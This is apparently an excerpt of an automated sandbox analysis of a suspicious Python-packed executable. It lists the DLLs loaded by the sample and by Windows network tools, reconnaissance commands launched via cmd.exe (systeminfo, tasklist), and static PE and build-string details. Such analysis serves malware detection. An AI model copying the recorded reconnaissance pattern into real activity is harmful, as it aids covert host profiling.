                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: ntshrui.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: snmpapi.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: inetmib1.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: dnsapi.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: snmpapi.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: inetmib1.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: python311.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: libffi-8.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: python3.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: libcrypto-1_1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: libssl-1_1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: RuntimeusererVers.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: RuntimeusererVers.exeStatic file information: File size 13747712 > 1048576
                      Source: RuntimeusererVers.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcece00
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: RuntimeusererVers.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: RuntimeusererVers.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD6F5000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000037.00000003.1583982311.000002255BAF4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD6F5000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000037.00000003.1583982311.000002255BAF4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDC69000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B7311000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: crypto\stack\stack.cOPENSSL_sk_dupOPENSSL_sk_deep_copysk_reserveOPENSSL_sk_new_reserveOPENSSL_sk_reserveOPENSSL_sk_insertOPENSSL_sk_seti=%dcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC3.1.4built on: Fri Nov 24 00:12:45 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptoOPENSSL_atexitcrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdbcQ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
